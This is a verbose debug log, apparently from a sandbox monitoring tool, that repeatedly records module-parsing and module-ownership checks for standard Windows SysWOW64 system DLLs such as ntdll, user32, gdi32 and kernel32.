2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,089 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,105 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,121 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,137 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,153 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,167 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,200 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,200 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,214 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:33,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:33,214 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:33,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:33,214 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:33,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:33,214 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:33,214 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,230 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,246 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,262 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,278 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,292 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:33,292 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:33,292 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,292 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:33,309 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:33,309 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:33,309 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,323 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,339 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,355 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,371 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,387 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,401 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,417 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,434 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,448 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:33,464 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
